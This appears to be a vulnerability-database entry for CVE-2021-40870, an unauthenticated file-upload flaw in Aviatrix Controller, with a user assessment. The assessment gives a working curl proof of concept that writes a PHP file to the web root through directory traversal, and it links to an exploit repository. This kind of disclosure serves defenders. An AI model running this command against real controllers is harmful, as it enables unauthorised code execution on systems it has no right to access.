CVE-2021-40870

An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.

Recent assessments:

JoyGhoshs at October 09, 2021 6:33am UTC reported:

Description

This Vulnerability allows an attacker to create and store file on the Aviatrix controller. Exploitation phase doesn’t need any user authentication , or doesn’t require any other users interaction , simply can be exploited using curl . Here is one example.

curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'

# after executing the previous command if the target is vulnerable this will create a php file on this path

https://vulnerable.target.com/v1/poc 

Attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem .

Or You can Use This Exploit to do the exploition more easily : <https://github.com/JoyGhoshs/CVE-2021-40870&gt;

Assessed Attacker Value: 3
Assessed Attacker Value: 3Assessed Attacker Value: 5